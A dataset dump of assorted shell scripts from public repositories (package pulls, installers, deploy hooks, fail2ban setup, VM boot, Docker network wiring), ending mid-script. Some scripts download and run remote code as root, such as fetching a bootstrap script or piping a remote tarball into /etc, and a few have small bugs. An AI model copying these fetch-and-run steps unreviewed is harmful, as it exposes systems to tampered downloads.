blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
daf29692535accdd35a15ee7f71a25d61f87ab38
|
Shell
|
olberger/Labtainers
|
/setup_scripts/pull-all.sh
|
UTF-8
| 797
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
#
# pull the baseline labtainer images from the appropriate registry
# NOTE use of environment variable TEST_REGISTRY
# Script assumes the pwd is the parent of the labtainer directory
# Intended to be called from update-labtainer.sh
#
if [ "$TEST_REGISTRY" == TRUE ] || [ "$1" == -t ]; then
registry=$(grep TEST_REGISTRY ../config/labtainer.config | tr -s ' ' | cut -d ' ' -f 3)
else
registry=$(grep DEFAULT_REGISTRY ../config/labtainer.config | tr -s ' ' | cut -d ' ' -f 3)
fi
echo "pull from $registry"
docker pull $registry/labtainer.base
docker pull $registry/labtainer.network
docker pull $registry/labtainer.firefox
docker pull $registry/labtainer.wireshark
docker pull $registry/labtainer.java
docker pull $registry/labtainer.centos
docker pull $registry/labtainer.lamp
| true
|
80404c622eaa71b8d77d1be13a608b2304580d1c
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/cjdns-git-sysvinit/PKGBUILD
|
UTF-8
| 767
| 2.8125
| 3
|
[] |
no_license
|
# Maintainer: Prurigro
pkgname=cjdns-git-sysvinit
pkgver=20140626.r12.dda687c
pkgrel=1
pkgdesc="Legacy sysvinit (rc.d/init.d) service for the cjdns-git package"
url="https://github.com/prurigro/${pkgname}"
license=('GPL2')
arch=('any')
depends=('cjdns-git' 'bash')
makedepends=('git')
source=("git://github.com/prurigro/${pkgname}.git#branch=master")
sha512sums=('SKIP')
pkgver() {
cd $pkgname
printf "%s.r%s.%s" "$(git show -s --format=%ci master | sed 's/\ .*//g;s/-//g')" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
}
package() {
install -Dm644 ${pkgname}/cjdns "${pkgdir}"/etc/default/cjdns
install -Dm755 ${pkgname}/cjdns.sh "${pkgdir}"/usr/bin/cjdns.sh
install -Dm755 ${pkgname}/cjdns.rc.d "${pkgdir}"/etc/rc.d/cjdns
}
| true
|
bb657c0f04f0ac4577b105510a695c492bbe2081
|
Shell
|
SquareBracketAssociates/DeepIntoPharo
|
/build-chapters-and-upload.sh
|
UTF-8
| 1,193
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
TEMP_DIR=/tmp
SVN_REPO=svn+ssh://scm.gforge.inria.fr/svn/pharobooks
REMOTE_SERVER=scm.gforge.inria.fr
REMOTE_PATH=/home/groups/pharobooks/htdocs
REMOTE=$REMOTE_SERVER:$REMOTE_PATH
BOOK=PharoByExampleTwo-Eng
DOWNLOAD_URL=http://pharobooks.gforge.inria.fr/PharoByExampleTwo-Eng
cd $TEMP_DIR
rm -rf $BOOK
svn co $SVN_REPO/$BOOK
cd $BOOK
chapters=$(cat PBE2.tex | grep '^\\input' | grep -v common.tex | sed -e 's/^\\input{\([^}]*\)}.*$/\1/')
# First try to compile all chapters before uploading anything
for chapter in $chapters; do
echo ======================================================================
echo COMPILING $chapter
echo ======================================================================
file=$(basename $chapter)
cd $(dirname $chapter)
pdflatex $file
pdflatex $file
cd ..
done
upload_id=$(date -u +%F_%T)
files_to_upload=$(echo $chapters | sed 's/\.tex/.pdf/g')
mkdir tmp
mv $files_to_upload tmp/
cd tmp
echo
echo "Uploading to $DOWNLOAD_URL..."
echo
tar vcf - *.pdf | \
ssh $USER@$REMOTE_SERVER \
"cd $REMOTE_PATH/$BOOK; mkdir $upload_id; cd $upload_id; tar vxf -; cd ..; unlink latest; ln -s $upload_id latest"
| true
|
96a71eb99728fbb12d9f90a8d931569551e1c201
|
Shell
|
izenecloud/ijma
|
/bin/smoke_test/diff.sh
|
UTF-8
| 504
| 3.53125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
GOLD_DIR=smoke_test/gold
OUTPUT_DIR=smoke_test/output
# option "-w" to ignore white space different between Linux and Win32.
diff -qw ${GOLD_DIR} ${OUTPUT_DIR}
# check multi-thread results
MULTI_DIR=smoke_test/multithread
GOLD_FILE=${GOLD_DIR}/result_jma_run_stream.utf8
count=0
for file in `find ${MULTI_DIR}/*`
do
diff -qw ${GOLD_FILE} ${file}
let count++
done
THREAD_NUM=100
if [ $count != $THREAD_NUM ]
then
echo "error: $THREAD_NUM threads output only $count results."
fi
| true
|
45340626d4e4f67448d48ab9d323238f8cbe133e
|
Shell
|
mareksapota/dotfiles
|
/x/xmonad/scripts/on_restart.sh
|
UTF-8
| 481
| 3.203125
| 3
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
#!/bin/bash
stage=$1
run()
{
if [[ "$stage" = "before" ]]; then
killall "$1"
fi
if [[ "$stage" = "after" ]]; then
nohup "$@" &> /dev/null &
fi
}
stop()
{
if [[ "$stage" = "before" ]]; then
killall "$1"
fi
}
run nm-applet
run parcellite
run xscreensaver
stop xmobar
if [[ "$stage" = "after" ]]; then
~/.xmonad/scripts/setbg.sh
# Make the arrow cursor default instead of the "X" one.
xsetroot -cursor_name left_ptr
fi
| true
|
c639ec55728b893281d93b4a5fe44a176a0114b1
|
Shell
|
benzBrake/Shell_Collections
|
/fail2ban/fail2ban.sh
|
UTF-8
| 4,404
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/sh
#
# Onekey install script for fail2ban
# Author: Char1sma
# Email: github-char1sma@woai.ru
MIN_CENTOS_VER=5
MIN_DEBIAN_VER=6
MIN_UBUNTU_VER=12
SSH_PORT=$(netstat -ntlp|grep sshd |awk -F: '{if($4!="")print $4}' | head -n 1 | sed 's/[^1-9]//')
linux_check(){
if $(grep -qi "CentOS" /etc/issue) || $(grep -q "CentOS" /etc/*-release); then
OS="CentOS"
elif $(grep -qi "Ubuntu" /etc/issue) || $(grep -q "Ubuntu" /etc/*-release); then
OS="Ubuntu"
elif $(grep -qi "Debian" /etc/issue) || $(grep -q "Debian" /etc/*-release); then
OS="Debian"
else
cat >&2 <<-EOF
This shell only support CentOS ${MIN_CENTOS_VER}+, Debian ${MIN_DEBIAN_VER}+ or Ubuntu ${MIN_UBUNTU_VER}+, if you want to run this shell on other system, please write shell by yourself.
EOF
exit 1
fi
OS_VSRSION=$(grep -oEh "[0-9]+" /etc/*-release | head -n 1) || {
cat >&2 <<-'EOF'
Fail to detect os version, please feed back to author!
EOF
exit 1
}
}
install(){
[ ! -f ~/bin/fb.sh ] || exit 1
linux_check
if [ "$OS" = "CentOS" ]; then
LOG_PATH="/var/log/secure"
centos_install
elif [ "$OS" = "Debian" ]; then
LOG_PATH="/var/log/auth.log"
debian_install
else
LOG_PATH="/var/log/auth.log"
ubuntu_install
fi
[ -d ~/bin ] || mkdir -p ~/bin
wget --no-check-certificate https://raw.githubusercontent.com/Char1sma/Shell_Collections/master/fail2ban/fail2ban.sh -O ~/bin/fb.sh
chmod +x ~/bin/fb.sh
}
write_conf() {
[ -d /etc/fail2ban ] || mkdir -p /etc/fail2ban
cd /etc/fail2ban
wget --no-check-certificate https://raw.githubusercontent.com/Char1sma/Shell_Collections/master/fail2ban/fail2ban.tar.gz -O- | tar -zxvf -
sed -i "s%SSH_PORT%$SSH_PORT%g" /etc/fail2ban/jail.conf
sed -i "s%LOG_PATH%$LOG_PATH%g" /etc/fail2ban/jail.conf
unset LOG_PATH
[ -d /var/run/fail2ban ] || mkdir -p /var/run/fail2ban
}
centos_install(){
rpm -ivh "https://dl.fedoraproject.org/pub/epel/epel-release-latest-$OS_VSRSION.noarch.rpm"
yum -y install fail2ban
[ -d /var/run/fail2ban ] || mkdir -p /var/run/fail2ban
wget --no-check-certificate https://raw.githubusercontent.com/Char1sma/Shell_Collections/master/fail2ban/jail.local.centos -O /etc/fail2ban/jail.local
sed -i "s%SSH_PORT%$SSH_PORT%g" /etc/fail2ban/jail.local
sed -i "s%LOG_PATH%$LOG_PATH%g" /etc/fail2ban/jail.local
if [ "$OS_VSRSION" -gt 6 ]; then
systemctl restart fail2ban
systemctl enable fail2ban
else
service fail2ban restart
chkconfig fail2ban on
fi
}
debian_install(){
if [ "$OS_VSRSION" -lt 7 ]; then
echo 'Acquire::Check-Valid-Until "false";' >/etc/apt/apt.conf.d/90ignore-release-date
echo "deb http://archive.debian.org/debian-archive/debian squeeze main" > /etc/apt/sources.list
echo "deb http://archive.debian.org/debian-archive/debian squeeze-proposed-updates main" >> /etc/apt/sources.list
echo "deb http://security.debian.org squeeze/updates main" >> /etc/apt/sources.list
echo "deb http://archive.debian.org/debian-archive/debian squeeze-lts main contrib non-free" >> /etc/apt/sources.list
#install gpg key
apt-get -y install debian-archive-keyring
fi
apt-get -y update
apt-get -y install fail2ban
write_conf
service fail2ban start
update-rc.d fail2ban enable
}
ubuntu_install(){
debian_install
}
show_log(){
linux_check
echo "Line UserName IP"
if [ "$OS" = "CentOS" ]; then
cat /var/log/secure* | grep 'Failed password' | awk 'BEGIN{sum=0;}{sum ++;if ($9 == "invalid") { print $11 "\t" $13 } else { print $9 "\t" $11; }}END{ print "SUM:" sum}'
else
grep 'Failed password' /var/log/auth.log | awk 'BEGIN{sum=0;}{sum ++;if ($9 == "invalid") { print $11 "\t" $13 } else { print $9 "\t" $11; }}END{ print "SUM:" sum}'
fi
}
uninstall() {
linux_check
if [ "$OS" = "CentOS" ]; then
yum -y remove fail2ban\*
else
apt-get -y remove fail2ban
fi
rm /etc/fail2ban/ -rf
rm /var/run/fail2ban/ -rf
rm ~/bin/fb.sh -rf
}
root_check() {
if [ $(id -u) -ne 0 ]; then
echo "Error:This script must be run as root!" 1>&2
exit 1
fi
}
#root_check
case $1 in
h|H|help)
echo "Usage: $0 [OPTION]"
echo ""
echo "Here are the options:"
echo "install install fail2ban"
echo "uninstall uninstall fail2ban"
echo "showlog show failed login logs"
;;
unban)
unban "$2"
;;
showlog)
show_log;;
install)
install;;
uninstall)
uninstall;;
*)
echo "$0 : invalid option -- '$1'"
echo "Try '$0 help' for more infomation."
exit 0;;
esac
| true
|
ff9033c7298bef01058bb2fd01f14bc882eba3f4
|
Shell
|
theKono/orchid
|
/deploy/notification/after_install.sh.tmpl
|
UTF-8
| 455
| 3.21875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# After application is copied to final destination folder
if [[ "$DEPLOYMENT_GROUP_NAME" == "Development" ]]; then
name=notification-writer-dev
supervisor_prog=notification-writer-dev
else
name=notification-writer
supervisor_prog=notification-writer
fi
new_release_dir=/srv/$name/release/{{tag}}
cd $new_release_dir
rm /srv/$name/current -f
ln -s $new_release_dir /srv/$name/current
supervisorctl restart $supervisor_prog
| true
|
aa87d96ec2b7e40ebbbc8feb8712892ce057932e
|
Shell
|
sung1011/meepo
|
/init.sh
|
UTF-8
| 1,080
| 3.546875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/bash
# ==================== const
# 程序目录
CRACK_PATH="/usr/local/crack/"
# 源码目录
CRACK_PKG_PATH="/usr/local/crack/pkg/"
# bin目录
CRACK_BIN_PATH="/usr/local/bin/"
# go version
GO_VER="1.15.6"
# ==================== func
function isCmdExist() {
local cmd="$1"
if [ -z "$cmd" ]; then
echo "Usage isCmdExist yourCmd"
return 1
fi
if ! which "$cmd" >/dev/null 2>&1;
then
return 0
fi
return 2
}
# ==================== install
# -------- dir
mkdir -p "$CRACK_PATH"
mkdir -p "$CRACK_PKG_PATH"
# -------- go
if ! isCmdExist go; then
# download golang
curl -sL https://golang.org/dl/go"$GO_VER".linux-amd64.tar.gz > /tmp/go"$GO_VER".tar.gz
# install golang
tar -zxvf /tmp/go"$GO_VER".tar.gz -C "$CRACK_PATH"
# link bin
ln -s "$CRACK_PATH"go/bin/go "$CRACK_BIN_PATH"
fi
# export GOPATH=$HOME/go
# export PATH=$PATH:$GOPATH/bin
# -------- git
if ! isCmdExist git; then
# install
yum install -y git
fi
# -------- meepo
# install
go get -u -v github.com/sung1011/meepo
| true
|
248b1ed70c0f521ffdcd5b09d27346bedc6ff3a6
|
Shell
|
MichaelFoss/octo-merge
|
/make_octo_txt.sh
|
UTF-8
| 399
| 3.703125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Create the file that will be octo-merged
# If it exists, nothing will happen besides changing the modified date
touch octo_test.txt
# Empty the contents of the file
cp /dev/null octo_test.txt
# Add n lines to the file
# Format of line is:
# "This is line 1 _"
for i in $(eval echo "{1..$1}")
do
echo "This is line $i _" >> octo_test.txt;
echo -e "\n" >> octo_test.txt;
done
| true
|
9231be6ef69d156e2f5bf141ae1a64b70b84dc63
|
Shell
|
ucam-cl-dtg/dtg-puppet
|
/modules/dtg/files/vm-boot.sh
|
UTF-8
| 3,029
| 3.6875
| 4
|
[] |
no_license
|
#! /bin/bash
### BEGIN INIT INFO
# Provides: dtg-vm
# Required-Start: $local_fs $remote_fs
# Required-Stop: $local_fs $remote_fs
# Should-Start: $named
# Default-Start: 2 3 4 5
# Default-Stop:
# Short-Description: DTG vm properties
# Description: Apply puppet on VM start
### END INIT INFO
PUPPETBARE=/etc/puppet-bare
BOOTSTRAP="https://raw.github.com/ucam-cl-dtg/dtg-puppet/master/modules/dtg/files/bootstrap.sh"
AUTHORIZED_KEYS="/root/.ssh/authorized_keys"
DOM0_PUBLIC_KEY="ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAujx2sop6KNPYr6v/IWEpFITi964d89N3uVowvRo3X5f9a7fiquEphaXIvrMoF74TtmWe78NybfPPgKgTdmaBWYxhbykO7aC9QeY+iDcQqKWrLFlBAbqJ6GYJYfiSM0DZbmAXiAuguNhX1LU51zPRVKYf2/yAgCmJv2yammXppwCE+BJvBVqJziy2Cs0PKhI/26Altelc2tH+SMIlF9ZuSKCtAcyMTPQxTVrJ/zilmceh/U3LcLD3OlOD7XfHxUQ+fiH0KZ27dja6mnsb/OAvmqpmD8mYZs2vTUiFRH9V6HmQqQRO82a6XRRK6wHcGnh+J7JW45dO75lmtBElw1djyw== root@husky0.dtg.cl.cam.ac.uk"
APT_TS=/var/lib/apt/periodic/update-success-stamp
# if there is a /dev/xvdb without partitions, let's use it
mounted=$(mount | grep /dev/xvdb)
if [ -e /dev/xvdb ] && [ ! -e /dev/xvdb1 ] && [[ -z $mounted ]]; then
echo "Creating a filesystem on /dev/xvdb"
mkfs.ext4 /dev/xvdb
echo "/dev/xvdb /local/data ext4 defaults,errors=remount-ro 0 1" >> /etc/fstab
if [ ! -d /local/data ]; then
mkdir -p /local/data
fi
mount -a
fi
# If we have a cache partition on /dev/xvda then remove it. We want to move
# to a partitionless world.
sed -i '/swap/d' /etc/fstab
fdisk -l | grep swap | grep xvda5 > /dev/null
if [ $? -eq 0 ]; then
parted -s /dev/xvda rm 5
fi
# Find the time since apt-get last successfully updated.
now=$(date +"%s")
last_apt=0
if [ -f ${APT_TS} ]; then
last_apt=$(stat -c %Y ${APT_TS})
fi
diff=$((now-last_apt))
if [[ $diff -gt 86400 ]]; then
# As apt hasn't been run successfully for more than a day, the machine
# has probably been shutdown for a while, so apply latest updates and
# run puppet.
# We don't run this on every boot or else a boot storm kills
# performance.
apt-get update
apt-get -y --no-install-recommends dist-upgrade
apt-get -y autoremove
if [ -d $PUPPETBARE ]; then
# Get the latest puppet config from code.dtg if we have already
# applied puppet to this machine.
cd /etc/puppet-bare
git fetch --quiet git://github.com/ucam-cl-dtg/dtg-puppet.git
./hooks/post-update
fi
fi
if [ ! -d $PUPPETBARE ]; then
wget $BOOTSTRAP
chmod +x bootstrap.sh
./bootstrap.sh | tee --append /var/log/bootstrap.log
fi
# if the hostname is puppy* (or ubuntu) then we want to import dom0's key so
# scripts can SSH in and sort this out. We don't want dom0 to
# monkeysphere. We also generate a new fingerprint
if echo "$HOSTNAME" | grep -q puppy || [ "$HOSTNAME" = "ubuntu" ]; then
rm -rf /etc/ssh/ssh_host_*
ssh-keygen -t ed25519 -h -f /etc/ssh/ssh_host_ed25519_key < /dev/null
ssh-keygen -t rsa -b 4096 -h -f /etc/ssh/ssh_host_rsa_key < /dev/null
mkdir -p /root/.ssh/
echo "${DOM0_PUBLIC_KEY}" >> $AUTHORIZED_KEYS
if [ "$(ifconfig eth0 | grep -Eo "..(:..){5}")" = "00:16:3e:e8:14:24" ]; then
echo dhcp > /etc/hostname
start hostname
cd /etc/puppet-bare
./hooks/post-update
fi
monkeysphere-authentication update-users
else
sed -i "\_${DOM0_PUBLIC_KEY}_d" $AUTHORIZED_KEYS
passwd -l root
sed -i "s/puppy[0-9]*/$HOSTNAME/g" /etc/hosts
fi
| true
|
33695243009e62636b943c015054e6cc4eaae425
|
Shell
|
SouthAfricaDigitalScience/cgal-deploy
|
/deploy.sh
|
UTF-8
| 1,389
| 3.421875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -e
# this should be run after check-build finishes.
. /etc/profile.d/modules.sh
module add deploy
module add cmake
module add zlib
module add lapack/3.7.0-gcc-${GCC_VERSION}
module add boost/1.63.0-gcc-${GCC_VERSION}-mpi-${OPENMPI_VERSION}
cd ${WORKSPACE}/${NAME}-${VERSION}/build-${BUILD_NUMBER}
echo "All tests have passed, will now build into ${SOFT_DIR}"
rm -rf
cmake ../ -G"Unix Makefiles" \
-DCMAKE_INSTALL_PREFIX=${SOFT_DIR}-gcc-${GCC_VERSION} \
-DWITH_LAPACK=ON \
-DWITH_ZLIB=ON \
-DZLIB_INCLUDE_DIR=${ZLIB_DIR}/include \
-DZLIB_LIBRARY_RELEASE=${ZLIB_DIR}/lib/libz.so
make install
echo "Creating the modules file directory ${LIBRARIES}"
mkdir -p ${LIBRARIES}/${NAME}
(
cat <<MODULE_FILE
#%Module1.0
## $NAME modulefile
##
proc ModulesHelp { } {
puts stderr " This module does nothing but alert the user"
puts stderr " that the [module-info name] module is not available"
}
module-whatis "$NAME $VERSION : See https://github.com/SouthAfricaDigitalScience/CGAL-deploy"
setenv CGAL_VERSION $VERSION
setenv CGAL_DIR $::env(CVMFS_DIR)/$::env(SITE)/$::env(OS)/$::env(ARCH)/$NAME/$VERSION-gcc-${GCC_VERSION}
prepend-path LD_LIBRARY_PATH $::env(CGAL_DIR)/lib
setenv CFLAGS "-I$::env(CGAL_DIR)/include $CPPFLAGS"
setenv LDFLAGS "-L$::env(CGAL_DIR)/lib ${LDFLAGS}"
MODULE_FILE
) > ${LIBRARIES}/${NAME}/${VERSION}
| true
|
e68beca30b0ffe07fcd705f241ab6b337afe5c12
|
Shell
|
alan-turing-institute/s3ToAzure
|
/parallel_download.sh
|
UTF-8
| 787
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
while getopts i:w:n:k:c option
do
case "${option}"
in
i) fileslist=${OPTARG};;
w) workers=${OPTARG};;
n) azure_storage_name=${OPTARG};;
k) azure_storage_key=${OPTARG};;
c) azure_container_name=$OPTARG;;
esac
done
lines=`wc -l < $filelist`
files_per_worker=`expr $lines / $workers`
directory="tmp"
# Create directory if not exist
mkdir -p $directory
# Remove everything in temporary directory
rm $directory/*
split -l $files_per_worker $filelist $directory/files_list
files=`ls $directory`
for file in $files; do
screen -dmS $file ./s3ToAzure.sh -filelist $directory/$file -azure_storage_name $azure_storage_name -azure_container_key $azure_storage_key -azure_container_name $azure_container_name
done
screen -ls
| true
|
fe043ba186748fdf54215c65e2699a55415eaf2a
|
Shell
|
postmanlabs/sails-mysql-transactions
|
/scripts/postinstall.sh
|
UTF-8
| 2,084
| 3.796875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
INFO="sails-mysql-transactions:"; # for console logs
set -e;
# If this is an NPM installation, we do not expect `.gitmodules` in the directory
# since it is ignored by `.npmignore`. This is a fairly robust check to test whether
# this script has been run as part of npm install or as part of self install.
if [ -f ".gitmodules" ]; then
echo "${INFO} Not an NPM install, exiting waterline injection.";
exit 0;
fi;
# Check whether sails has been already installed or not. If not, this is an
# error and we should not proceed.
if [ ! -d "../../node_modules/sails" ] && [ ! -d "../../node_modules/waterline" ]; then
echo -e "\033[1;31m";
echo "${INFO} Sails and waterline installation not found!";
echo "${INFO} Ensure your package.json, which has sails-mysql-transaction, also includes sails.";
echo -e "\033[0m\n";
exit 1;
fi
if [ ! -d "../../node_modules/waterline" ] && [ -d "../../node_modules/sails-mysql" ]; then
echo -e "\033[1;31m";
echo "${INFO} WARNING - detected sails-mysql.";
echo "${INFO} You may face unexpected behaviour.";
echo "${INFO} Preferably remove sails-mysql from packages before using this in production.";
echo -e "\033[0m\n";
fi
# most likely npm3
if [ -d "../../node_modules/waterline" ]; then
echo "${INFO} Injecting waterline into sails...";
pushd "../../" > /dev/null;
npm remove waterline;
npm install "node_modules/sails-mysql-transactions/waterline";
if [ -d "node_modules/sails/node_modules/waterline" ]; then
pushd "node_modules/sails" > /dev/null;
npm remove waterline;
popd > /dev/null;
fi
popd > /dev/null;
echo
echo "${INFO} Installation successful.";
echo
exit 0;
fi
if [ -d "../../node_modules/sails" ]; then
echo "${INFO} Injecting waterline into sails...";
pushd "../../node_modules/sails" > /dev/null;
npm remove waterline;
npm install "../sails-mysql-transactions/waterline";
popd > /dev/null;
echo
echo "${INFO} Installation successful.";
echo
exit 0;
fi
| true
|
d53593a4469852ce873003cbde20b24737635c52
|
Shell
|
ronban/mfa-secman
|
/mfa/utils/read-root-pwd.sh
|
UTF-8
| 341
| 2.828125
| 3
|
[] |
no_license
|
# !/bin/bash
read -p "Please enter the AWS region: " region
read -p "Please enter the account number: " accountnumber
echo "{ \"root_password_\": \"$password\"}" > $TMPDIR/root_password.json
aws --region $region secretsmanager \
get-secret-value --secret-id rootpwd_$accountnumber \
| jq -r 'SecretString'
rm -f $TMPDIR/root_password.json
| true
|
277bdfa3dddab2816f4baf8b1a531fae1be6ef2a
|
Shell
|
Prabhurajn/shellscript_create_linuxusers
|
/sysuser.sh
|
UTF-8
| 753
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
read -p "Enter File name:" fl
count=0;
paswd="sicsr123"
if [ -e $fl ]
then
line=`wc -l < $fl`;
while [ $count -lt $line ]
do
let count++;
users=`head -n $count $fl | tail -1 `
if [ $(id -u) -eq 0 ]; then
grep "^$users" /etc/passwd > /dev/null
if [ $? -eq 0 ]; then
echo "$users exist";
exit 1;
else
pass=$(perl -e 'print crypt($ARGV[0],"password")' $paswd)
useradd -m -p $pass $users -s /bin/bash
[ $? -eq 0 ] && echo "$users has been added to system" >> successcreate || echo "Failed to add $users" >> failedcreate;
fi
else
echo "Only root can add";
exit 2;
fi
done
echo "Please Check the status in successcreate and failedcreate files";
else
echo "File doesen't exist";
exit 3;
fi
| true
|
c762103b1720f2dc73d9311bbf8257d6380fa6bd
|
Shell
|
moggiez/auth
|
/scripts/package_all.sh
|
UTF-8
| 292
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/bash
CODE_DIR=$PWD/code/cognito_triggers
DIST_DIR=$PWD/dist
LAMBDAS=("custom_message" "post_confirmation")
for lambda in "${LAMBDAS[@]}"
do
echo "Building lambda '$lambda'..."
$PWD/scripts/build_and_package_lambda.sh $CODE_DIR/$lambda $DIST_DIR ${lambda}.zip
echo ""
done
| true
|
6d9010646367ec69ff4ad2efa3fb561471454ae7
|
Shell
|
nixsolutions/ggf
|
/bin/composer.sh
|
UTF-8
| 536
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
DIR="$( cd "$( dirname "$0" )" && pwd )"
if [ ! -f $DIR/composer.phar ]
then
curl -sS https://getcomposer.org/installer | php -- --install-dir=$DIR
else
php $DIR/composer.phar self-update --profile
fi
php $DIR/composer.phar -V
php $DIR/composer.phar diagnose --profile
action="$2"
if [ "$action" != "update" ]
then
action=install
fi
case "$1" in
*live*) dev="--no-dev" ;;
*) dev="--dev" ;;
esac
php $DIR/composer.phar $action $dev --prefer-dist --optimize-autoloader --working-dir $DIR/.. --profile
| true
|
2b4125c4a98c0096dcb66f6fddafdcd4f487a964
|
Shell
|
minedec/vtools
|
/app/src/main/assets/kr-script/apps/cloudmusic_ad_set.sh
|
UTF-8
| 559
| 3.015625
| 3
|
[] |
no_license
|
#!/system/bin/sh
function unlock_dir() {
chattr -i $1 2> /dev/null
$BUSYBOX chattr -i $1 2> /dev/null
rm -rf $1 2> /dev/null
}
function lock_dir() {
unlock_dir $1
echo "" > $1
chattr +i $1 2> /dev/null
$BUSYBOX chattr +i $1 2> /dev/null
}
if [[ "$state" = "0" ]]; then
lock_dir "$SDCARD_PATH/netease/cloudmusic/Ad"
lock_dir "$SDCARD_PATH/Android/data/com.netease.cloudmusic/cache/Ad"
else
unlock_dir "$SDCARD_PATH/netease/cloudmusic/Ad"
unlock_dir "$SDCARD_PATH/Android/data/com.netease.cloudmusic/cache/Ad"
fi
| true
|
44fb944cc87d85fb7f6c092d3df87ba6f0889a68
|
Shell
|
gakaya/initial_sys_config
|
/copy_files.sh
|
UTF-8
| 120
| 2.53125
| 3
|
[] |
no_license
|
DEST=/usr/local/bin
FILE=treeprint.sh
LINK=treeprint
cp $FILE $DEST
chmod +x $DEST/$FILE
ln -s $DEST/$FILE $DEST/$LINK
| true
|
01781f556b9a527a00238ce3ffb897839da45a42
|
Shell
|
karthickramalingam/dc-on-docker-li
|
/utils/docker-network-host.sh
|
UTF-8
| 7,230
| 3.546875
| 4
|
[] |
no_license
|
#! /usr/bin/env bash
# Docker picks the default network based on the network name
# in the alphabetical order. We put this prefix to all the
# network names so that those networks won't to be picked
# as the default networks.
#
# https://github.com/docker/docker/issues/21741
net_prefix="znet"
create_network_namespace()
{
for i in {5..8}; do
pid="$(docker inspect -f '{{.State.Pid}}' fab0${i})"
$(ln -s /proc/${pid}/ns/net /var/run/netns/${pid})
done
for i in {1..8}; do
pid="$(docker inspect -f '{{.State.Pid}}' csw0${i})"
$(ln -s /proc/${pid}/ns/net /var/run/netns/${pid})
done
for i in {1..4}; do
pid="$(docker inspect -f '{{.State.Pid}}' asw0${i})"
$(ln -s /proc/${pid}/ns/net /var/run/netns/${pid})
done
for i in {1..2}; do
pid="$(docker inspect -f '{{.State.Pid}}' host${i})"
$(ln -s /proc/${pid}/ns/net /var/run/netns/${pid})
done
}
# create fabric networks
create_fabric_networks()
{
for i in {1..4}; do
docker network inspect ${net_prefix}41${i} > /dev/null
if [ $? != 0 ]; then
docker network create \
--subnet=10.0.4${i}.0/24 \
--gateway=10.0.4${i}.254 ${net_prefix}41${i}
fi
done
}
# create leaf networks
create_leaf_networks()
{
for i in {1..4}; do
docker network inspect ${net_prefix}51${i} > /dev/null
if [ $? != 0 ]; then
docker network create \
--subnet=10.0.5${i}.0/24 \
--gateway=10.0.5${i}.254 ${net_prefix}51${i}
fi
done
}
# connect fabric switch
connect_fabric_switches()
{
for j in {5..8}; do
docker inspect fab0${j} > /dev/null
declare cswPortID="eth$(expr ${j} - 4)"
if [ $? = 0 ]; then
declare fabPID="$(docker inspect -f '{{.State.Pid}}' fab0${j})"
for i in {1..8}; do
docker inspect csw0${i} > /dev/null
if [ $? = 0 ]; then
declare fabPortID="eth${i}"
declare cswPID="$(docker inspect -f '{{.State.Pid}}' csw0${i})"
ip link add ${fabPortID}A type veth peer name ${cswPortID}B
ip link set ${fabPortID}A netns ${fabPID}
ip netns exec ${fabPID} ip link set ${fabPortID}A name ${fabPortID}
ip netns exec ${fabPID} ip link set ${fabPortID} up
ip link set ${cswPortID}B netns ${cswPID}
ip netns exec ${cswPID} ip link set ${cswPortID}B name ${cswPortID}
ip netns exec ${cswPID} ip link set ${cswPortID} up
fi
done
fi
done
}
# connect spine switch
connect_spine_switches()
{
for j in {1..4}; do
docker inspect csw0${j} > /dev/null
declare aswPortID="eth${j}"
if [ $? = 0 ]; then
declare cswPID="$(docker inspect -f '{{.State.Pid}}' csw0${j})"
for i in {1..2}; do
docker inspect asw0${i} > /dev/null
if [ $? = 0 ]; then
declare cswPortID="eth$(expr ${i} + 4)"
declare aswPID="$(docker inspect -f '{{.State.Pid}}' asw0${i})"
ip link add ${cswPortID}A type veth peer name ${aswPortID}B
ip link set ${cswPortID}A netns ${cswPID}
ip netns exec ${cswPID} ip link set ${cswPortID}A name ${cswPortID}
ip netns exec ${cswPID} ip link set ${cswPortID} up
ip link set ${aswPortID}B netns ${aswPID}
ip netns exec ${aswPID} ip link set ${aswPortID}B name ${aswPortID}
ip netns exec ${aswPID} ip link set ${aswPortID} up
fi
done
fi
done
for j in {5..8}; do
docker inspect csw0${j} > /dev/null
declare aswPortID="eth$(expr ${j} - 4)"
if [ $? = 0 ]; then
declare cswPID="$(docker inspect -f '{{.State.Pid}}' csw0${j})"
for i in {3..4}; do
docker inspect asw0${i} > /dev/null
if [ $? = 0 ]; then
declare cswPortID="eth$(expr ${i} + 2)"
declare aswPID="$(docker inspect -f '{{.State.Pid}}' asw0${i})"
ip link add ${cswPortID}A type veth peer name ${aswPortID}B
ip link set ${cswPortID}A netns ${cswPID}
ip netns exec ${cswPID} ip link set ${cswPortID}A name ${cswPortID}
ip netns exec ${cswPID} ip link set ${cswPortID} up
ip link set ${aswPortID}B netns ${aswPID}
ip netns exec ${aswPID} ip link set ${aswPortID}B name ${aswPortID}
ip netns exec ${aswPID} ip link set ${aswPortID} up
fi
done
fi
done
}
# connect servers to fabric networks
connect_servers_to_fabric_networks()
{
docker inspect host1 > /dev/null
if [ $? = 0 ]; then
docker network connect ${net_prefix}411 fab05
docker network connect ${net_prefix}412 fab06
docker network connect ${net_prefix}413 fab07
